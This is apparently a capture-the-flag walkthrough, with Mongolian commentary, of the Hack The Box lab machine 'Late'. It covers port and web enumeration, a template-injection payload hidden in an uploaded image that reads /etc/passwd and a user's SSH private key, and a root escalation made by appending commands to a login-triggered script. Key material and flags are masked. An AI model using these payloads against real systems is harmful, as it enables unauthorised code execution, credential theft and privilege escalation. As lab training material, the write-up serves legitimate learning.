1. IP Address
# Machine Address
10.10.11.156
# Local Address
10.10.14.44
2. Nmap & Nikto
nmap
nmap -sC -sV -oA nmap/late 10.10.11.156
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 22:28 EDT
Nmap scan report for 10.10.11.156
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.86 seconds
Nikto
nikto -h 10.10.11.156
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.156
+ Target Hostname: 10.10.11.156
+ Target Port: 80
+ Start Time: 2022-07-14 22:29:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
3. Feroxbuster & ffuf
feroxbuster -u http://late.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://late.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 7l 13w 194c http://late.htb/assets
301 7l 13w 194c http://late.htb/assets/css
301 7l 13w 194c http://late.htb/assets/images
301 7l 13w 194c http://late.htb/assets/js
301 7l 13w 194c http://late.htb/assets/fonts
[####################] - 2m 179994/179994 0s found:5 errors:0
[####################] - 2m 29999/29999 204/s http://late.htb
[####################] - 2m 29999/29999 205/s http://late.htb/assets
[####################] - 2m 29999/29999 205/s http://late.htb/assets/css
[####################] - 2m 29999/29999 205/s http://late.htb/assets/images
[####################] - 2m 29999/29999 205/s http://late.htb/assets/js
[####################] - 2m 29999/29999 205/s http://late.htb/assets/fonts
ffuf
ffuf -c -u http://late.htb/ -H "Host: FUZZ.devzat.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 9461
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://late.htb/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.late.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 9461
________________________________________________
images [Status: 200, Size: 2187, Words: 448, Lines: 64]
:: Progress: [4989/4989] :: Job [1/1] :: 169 req/sec :: Duration: [0:00:30] :: Errors: 0 ::
4. Burp
POST /scanner HTTP/1.1
Host: images.late.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------260872003713748502303208156715
Content-Length: 33052
Origin: http://images.late.htb
DNT: 1
Connection: close
Referer: http://images.late.htb/
Upgrade-Insecure-Requests: 1
-----------------------------260872003713748502303208156715
Content-Disposition: form-data; name="file"; filename="Screenshot_2022-07-15 Image Reader.png"
Content-Type: image/png
PNG
-----------------------------260872003713748502303208156715--
https://cloudconvert.com/txt-to-jpg - ашиглаад passwd -г txt болгон гаргаж авбал:
{{(''.__class__).__mro__[1].__subclasses__()[249]("cat /etc/passwd", stdout=-1, shell=True).communicate() }}
txt-г jpg хөрвүүлэлт хийгээд upload хийвэл: result.txt
<p>(b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nsshd:x:110:65534::/run/sshd:/usr/sbin/nologin\nsvc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash\nrtkit:x:111:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\nusbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\navahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\ncups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\nsaned:x:115:119::/var/lib/saned:/usr/sbin/nologin\ncolord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\npulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\ngeoclue:x:118:123::/var/lib/geoclue:/usr/sbin/nologin\nsmmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin\nsmmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin\n', None)
</p>%
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
svc_acc - ssh авах
{{(''.__class__).__mro__[1].__subclasses__()[249]("cat ~/.ssh/id_rsa", stdout=-1, shell=True).communicate() }}
id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEp*****************
-----END RSA PRIVATE KEY-----
user.txt
550e06****************
5. Privilege escalation
pspy уншуулаад харвал:
svc_acc@late:/usr/local/sbin$ cat ssh-alert.sh
#!/bin/bash
RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"
BODY="
A SSH login was detected.
User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
lsattr
a
- echo ашиглаад энэ файл руу утга оруулж болно.
svc_acc@late:/usr/local/sbin$ lsattr ssh-alert.sh
-----a--------e--- ssh-alert.sh
tmp дотор txt үүсгээд:
cat /root/root.txt >> /home/svc_acc/flag.txt
ssh-alert руу append хийнэ:
cat /tmp/haha.txt >> /usr/local/sbin/ssh-alert.sh
ssh-alert.sh-г trigger хийж ажилуулахын тулд svc_acc -s гараад эргээд id_rsa-р орно. Тэгээд flag.txt дотор root.txt байгаа.
root.txt
63195a4*********